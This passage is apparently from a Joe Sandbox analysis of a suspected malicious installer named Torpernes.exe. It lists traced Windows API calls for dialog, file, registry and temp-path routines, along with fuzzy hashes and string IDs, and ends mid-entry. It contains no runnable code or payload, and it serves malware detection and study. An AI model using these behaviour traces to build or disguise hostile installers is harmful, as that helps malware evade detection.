                                            • Opcode Fuzzy Hash: 46a75bfcdf0f655e43968d2b9fd1626b2727312735866fde2716e11fe0eeafa7
                                            • Instruction Fuzzy Hash: B6F05EB16101149BCB10EBA4DD499EEB378FF04318F6045BAF141F31D0D6B459409B2A
                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404262
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404276
                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404293
                                            • GetSysColor.USER32(?), ref: 004042A4
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004042B2
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004042C0
                                            • lstrlenW.KERNEL32(?), ref: 004042C5
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004042D2
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004042E7
                                            • GetDlgItem.USER32(?,0000040A), ref: 00404340
                                            • SendMessageW.USER32(00000000), ref: 00404347
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404372
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004043B5
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004043C3
                                            • SetCursor.USER32(00000000), ref: 004043C6
                                            • ShellExecuteW.SHELL32(0000070B,open,`qB,00000000,00000000,00000001), ref: 004043DB
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004043E7
                                            • SetCursor.USER32(00000000), ref: 004043EA
                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404419
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040442B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: N$`qB$open
                                            • API String ID: 3615053054-3589638645
                                            • Opcode ID: 52352e1598e21c6738b30937b27fb9d187c760a63e9d8340ab691ca5d092bea6
                                            • Instruction ID: 90332823e9378a57a65084aeaf39a46f2e0fe04d3774f3cfafdc0ffa1ca1b148
                                            • Opcode Fuzzy Hash: 52352e1598e21c6738b30937b27fb9d187c760a63e9d8340ab691ca5d092bea6
                                            • Instruction Fuzzy Hash: C87161B1A00209BFDB109F64DD85E6A7B69FB84315F00843AFB05B62D1C778AD51CFA9
                                            APIs
                                            • lstrcpyW.KERNEL32(00425D50,NUL), ref: 00405B47
                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405CDB,?,?,00000001,00405853,?,00000000,000000F1,?), ref: 00405B6B
                                            • GetShortPathNameW.KERNEL32(00000000,00425D50,00000400), ref: 00405B74
                                              • Part of subcall function 004059EA: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 004059FA
                                              • Part of subcall function 004059EA: lstrlenA.KERNEL32(00405C24,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 00405A2C
                                            • GetShortPathNameW.KERNEL32(?,00426550,00000400), ref: 00405B91
                                            • wsprintfA.USER32 ref: 00405BAF
                                            • GetFileSize.KERNEL32(00000000,00000000,00426550,C0000000,00000004,00426550,?,?,?,?,?), ref: 00405BEA
                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405BF9
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405C31
                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425950,00000000,-0000000A,00409530,00000000,[Rename],00000000,00000000,00000000), ref: 00405C87
                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405C99
                                            • GlobalFree.KERNEL32(00000000), ref: 00405CA0
                                            • CloseHandle.KERNEL32(00000000), ref: 00405CA7
                                              • Part of subcall function 00405A85: GetFileAttributesW.KERNELBASE(00000003,00402DA9,C:\Users\user\Desktop\Torpernes.exe,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00405A89
                                              • Part of subcall function 00405A85: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403455,?), ref: 00405AAB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                            • String ID: %ls=%ls$NUL$P]B$PeB$[Rename]
                                            • API String ID: 1265525490-1712624446
                                            • Opcode ID: b26fa6636d2ccb6f0e04fd9a6c311f54ca2b11ab4b2b187919472fa5f24e948f
                                            • Instruction ID: b9e722bee1e3d5643c0ee6ce27492db21a7ddaf58c344bd4a326e946b13d45f5
                                            • Opcode Fuzzy Hash: b26fa6636d2ccb6f0e04fd9a6c311f54ca2b11ab4b2b187919472fa5f24e948f
                                            • Instruction Fuzzy Hash: 5F410571A08B15BFE2206B619C49F6B3B5CDF45758F14013ABA01F22D2E63CA9018E7D
                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,004281C0,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 06542edcf82c941fcb0ea04d557428ccb15455088f1b67a948e491e3148a3cff
                                            • Instruction ID: 3444b066cc79e46fd946f20d531651005d710df5863fb735ae49ac58aced53cb
                                            • Opcode Fuzzy Hash: 06542edcf82c941fcb0ea04d557428ccb15455088f1b67a948e491e3148a3cff
                                            • Instruction Fuzzy Hash: 4E418A71804249AFCB058FA5DD459BFBBB9FF48310F00812AF951AA1A0C738EA51DFA5
                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Torpernes.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406110
                                            • CharNextW.USER32(?,?,?,00000000), ref: 0040611F
                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\Torpernes.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406124
                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406137
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\Torpernes.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-4110420224
                                            • Opcode ID: b7edfb63e30c9305099e6cc7fb0a64cc7777acb6978fb1fb85fc979881d03aaa
                                            • Instruction ID: 4a2c8b93f3f00ad1f037595bc6cc76d7c6216582d8143effd024cbcf063a8f89
                                            • Opcode Fuzzy Hash: b7edfb63e30c9305099e6cc7fb0a64cc7777acb6978fb1fb85fc979881d03aaa
                                            • Instruction Fuzzy Hash: 7B11B62684022295DB317B148C44AB7B6B8EF54790F56803FED96732C1E77C5CA286AD
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 004040AB
                                            • GetSysColor.USER32(00000000), ref: 004040C7
                                            • SetTextColor.GDI32(?,00000000), ref: 004040D3
                                            • SetBkMode.GDI32(?,?), ref: 004040DF
                                            • GetSysColor.USER32(?), ref: 004040F2
                                            • SetBkColor.GDI32(?,?), ref: 00404102
                                            • DeleteObject.GDI32(?), ref: 0040411C
                                            • CreateBrushIndirect.GDI32(?), ref: 00404126
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                            • Instruction ID: c86db10b712075dc0fdd11195a27afd72c2c4955ef31593f119c7b4a1354f6c1
                                            • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                            • Instruction Fuzzy Hash: 012196B1904744ABCB319F68DD08B4BBBF8AF40714F048629E991F66E0C738E944CB65
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                            • GlobalFree.KERNEL32(00000000), ref: 00402877
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                            • String ID:
                                            • API String ID: 3294113728-0
                                            • Opcode ID: 5978231e7d85de4122752ab0311afae4d845248ff6fec9fde577dd7b0cd2e14d
                                            • Instruction ID: 0a6bca8ecd63676026edbfb1c3c3c77fca9f2a16f8acb5fc7edd4aca8780f57a
                                            • Opcode Fuzzy Hash: 5978231e7d85de4122752ab0311afae4d845248ff6fec9fde577dd7b0cd2e14d
                                            • Instruction Fuzzy Hash: F231C471C00118BBDF11AFA5CE49DAF7E79EF08364F24423AF910762D1C6795E418BA9
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(?,?,0040A568,000000FF,skdeskindene,00000400,?,?,00000021), ref: 0040252F
                                            • lstrlenA.KERNEL32(skdeskindene,?,?,0040A568,000000FF,skdeskindene,00000400,?,?,00000021), ref: 00402536
                                            • WriteFile.KERNEL32(00000000,?,skdeskindene,00000000,?,?,00000000,00000011), ref: 00402568
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritelstrlen
                                            • String ID: 8$skdeskindene
                                            • API String ID: 1453599865-1245938444
                                            • Opcode ID: c626b69330e8d4113f8ae470d47427ea8bcabb27d685ee7f6299361e041b6526
                                            • Instruction ID: cff9808fb2b52db1cc78eea84bd95fecff25b82700627aa87d7ff40e926b01d0
                                            • Opcode Fuzzy Hash: c626b69330e8d4113f8ae470d47427ea8bcabb27d685ee7f6299361e041b6526
                                            • Instruction Fuzzy Hash: D6019271A44204FBD710AFB09E8AEAB7278EF50319F20443BB102B61D1D2BC4E41DA2D
                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004049A6
                                            • GetMessagePos.USER32 ref: 004049AE
                                            • ScreenToClient.USER32(?,?), ref: 004049C8
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004049DA
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404A00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                            • Instruction ID: 33ec571dbc4b5df47611d51f67fe054ec100feaa4e66978c3360ecba7af0637a
                                            • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                            • Instruction Fuzzy Hash: F9015271D00219BADB00DBA5DD45FFFBBBCAB54711F10416BBB10B61D0C7B4A6018B95
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                            • MulDiv.KERNEL32(00138E1C,00000064,00139780), ref: 00402CC8
                                            • wsprintfW.USER32 ref: 00402CD8
                                            • SetWindowTextW.USER32(?,?), ref: 00402CE8
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CFA
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402CD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: e3e17eb3883613bd01c428ecb9c51c517a45ea2d1b7fee79cfc654e1c3b0f8d9
                                            • Instruction ID: 24f1e3b0c7db3a4d5467dde3e45a6c68f3834aeb0eb2857db4594cab4802523f
                                            • Opcode Fuzzy Hash: e3e17eb3883613bd01c428ecb9c51c517a45ea2d1b7fee79cfc654e1c3b0f8d9
                                            • Instruction Fuzzy Hash: 3C014471644248BFEF24AF60DD49BEE3B69FB00305F008439FA06A52D0DBB89954DF59
                                            APIs
                                            • GetDC.USER32(?), ref: 00401D44
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                            • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                            • CreateFontIndirectW.GDI32(0040BD70), ref: 00401DBC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID: Tahoma
                                            • API String ID: 3808545654-3580928618
                                            • Opcode ID: 32b6ce07356b06b7402199ccc835c634dd9c912f69bb7b1e70a655b5b2c68e87
                                            • Instruction ID: c56ae0944857913282fa576ad39b26dea61a7ac65424af38da9408b7f1c95b65
                                            • Opcode Fuzzy Hash: 32b6ce07356b06b7402199ccc835c634dd9c912f69bb7b1e70a655b5b2c68e87
                                            • Instruction Fuzzy Hash: A5018631984245AFE7016BB0AE0EB9A7F74EB65306F144479F981B62E2C77810059B7E
                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                            • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                            • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: 6ce800f2fb93d43145e75ed60dbe9ac83d8f3b4aa2f8eb12b3c3c44b6db942aa
                                            • Instruction ID: a46f1669fd62fcddf5759aea02b57c8eb471e7750102af69c7615fdbe320007b
                                            • Opcode Fuzzy Hash: 6ce800f2fb93d43145e75ed60dbe9ac83d8f3b4aa2f8eb12b3c3c44b6db942aa
                                            • Instruction Fuzzy Hash: 58116A31904008FEEF219F90DE89EAE3B79EB54348F100476FA05B00A0D3B59E52EA69
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401CEB
                                            • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                            • DeleteObject.GDI32(00000000), ref: 00401D36
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: 9a58a4b1b714bdeb85b36b7ac0f1695ca93221bcfe231717776fd1430c9ecfe4
                                            • Instruction ID: 1e99a2e3ee0d8cb2cc55cfcb97cc18e88a7bebe3fbcc68e996072587d9c1a701
                                            • Opcode Fuzzy Hash: 9a58a4b1b714bdeb85b36b7ac0f1695ca93221bcfe231717776fd1430c9ecfe4
                                            • Instruction Fuzzy Hash: 40F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B105466F601F5190C674AD018B35
                                            APIs
                                            • lstrlenW.KERNEL32(004226B0,004226B0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 0040491E
                                            • wsprintfW.USER32 ref: 00404927
                                            • SetDlgItemTextW.USER32(?,004226B0), ref: 0040493A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 3885e31ac7d5a85145d604b6571c7e4e29987d56da45c0f8a49a039035cfdad5
                                            • Instruction ID: 30316ae283af339d029f00c0636502938e4caac6650f8f1893a4144cdcbf1ad5
                                            • Opcode Fuzzy Hash: 3885e31ac7d5a85145d604b6571c7e4e29987d56da45c0f8a49a039035cfdad5
                                            • Instruction Fuzzy Hash: E31127336041283BDB10666DDC46E9F328CEB81334F244637FA66F21D1E978CD1286E8
                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: d2f1c536d3abec192f7672cd80b0fc65265ad12a1adfda56e42982a5398ff586
                                            • Instruction ID: 743da8294e509753cf54931ea2bb8f6bb49c191bc618b2a67718bc92c973a6dd
                                            • Opcode Fuzzy Hash: d2f1c536d3abec192f7672cd80b0fc65265ad12a1adfda56e42982a5398ff586
                                            • Instruction Fuzzy Hash: 76217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Execute: ,?,00405F59,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405D10
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00405F59,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405D31
                                            • RegCloseKey.ADVAPI32(?,?,00405F59,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405D54
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: Execute:
                                            • API String ID: 3677997916-3756222843
                                            • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                            • Instruction ID: f206cf4e1b387d392a6c62c1d3125d9362d5881105c1227b1497b86cc88864d5
                                            • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                            • Instruction Fuzzy Hash: 1501087215020AEBDB218F56ED09EDB3BADEF45350F00802AF905D6260D335D964DFA5
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 0040586A
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00405874
                                            • lstrcatW.KERNEL32(?,00409014), ref: 00405886
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405864
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-3081826266
                                            • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                            • Instruction ID: cedf87931d265cf8398a6622ec802b5b6c0d438fa642e54ebbf9c46e89377be1
                                            • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                            • Instruction Fuzzy Hash: BAD05E311019206AC2226B449C05D9B63ACEE85340340443BF541B21A1C7781E518AFD
                                            APIs
                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                            • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                            • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                              • Part of subcall function 00405D60: wsprintfW.USER32 ref: 00405D6D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                            • String ID:
                                            • API String ID: 1404258612-0
                                            • Opcode ID: 74e200aaa936b3a7db4747673c60ce9f5ca8192e7551dfab6b5e032348f32eee
                                            • Instruction ID: bb6c5fc2a6f8d7f33e71238d936cb3f8bd62bfae150e474e5d39658e2f9f80dc
                                            • Opcode Fuzzy Hash: 74e200aaa936b3a7db4747673c60ce9f5ca8192e7551dfab6b5e032348f32eee
                                            • Instruction Fuzzy Hash: 65114871A00108BECB10DFA5C949DAEBBB9EF04344F20447AF905F62E1E7349E50CB28
                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,00402EE5,00000001,?,?,?,00000000,00403455,?), ref: 00402D18
                                            • GetTickCount.KERNEL32 ref: 00402D36
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402D53
                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403455,?), ref: 00402D61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: a23b0eeb6e6d4972e87045445d6d4d51cc27d3ed683f4ea74a3e72fc0bad27a9
                                            • Instruction ID: 28aec9c9a202fe59f1d02261ac296c366856500da95e57c0d1cdd64ebec4d4f3
                                            • Opcode Fuzzy Hash: a23b0eeb6e6d4972e87045445d6d4d51cc27d3ed683f4ea74a3e72fc0bad27a9
                                            • Instruction Fuzzy Hash: 30F05E30909235ABD6215B24FE4CD9B7FB9FB01B01B00447AF001B12E4D3B94C81CB9D
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00405064
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004050B5
                                              • Part of subcall function 00404073: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404085
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: e6b80f368e9379a4ad57220527a7cd8197c4644bc7861db4fd93b3e8285cb9c6
                                            • Instruction ID: 9c13ad67afaae448f0a4b319dcddee29e535cfa81e2793328e176173c0848073
                                            • Opcode Fuzzy Hash: e6b80f368e9379a4ad57220527a7cd8197c4644bc7861db4fd93b3e8285cb9c6
                                            • Instruction Fuzzy Hash: D0017171500608AFDF205F11DD81A6F3666EB84354F108136FA04B91D1C77A9C52DFAE
                                            APIs
                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004036EF,00403511,?), ref: 00403731
                                            • GlobalFree.KERNEL32(?), ref: 00403738
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403729
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 1100898210-3081826266
                                            • Opcode ID: 4e7f7c2125bebf8a47bea9b1e386030cefe453a8e1eea4b88b9a451776f0e8e5
                                            • Instruction ID: be347e1f20d4661a3264dec075a27cff7b7193600f0a8694255b986c9dfc1e8e
                                            • Opcode Fuzzy Hash: 4e7f7c2125bebf8a47bea9b1e386030cefe453a8e1eea4b88b9a451776f0e8e5
                                            • Instruction Fuzzy Hash: F9E0C273D010209BC7315F24FD0871AB7A8AF89F22F014166E9407B3A1C7746D534BD9
                                            APIs
                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402DD5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Torpernes.exe,C:\Users\user\Desktop\Torpernes.exe,80000000,00000003,?,?,?,00000000,00403455,?), ref: 004058B6
                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DD5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Torpernes.exe,C:\Users\user\Desktop\Torpernes.exe,80000000,00000003,?,?,?,00000000,00403455), ref: 004058C6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-224404859
                                            • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                            • Instruction ID: eae7ed8f36c736b41726b3deb9da1b14232adbbebc1b68a94f02937717e3e755
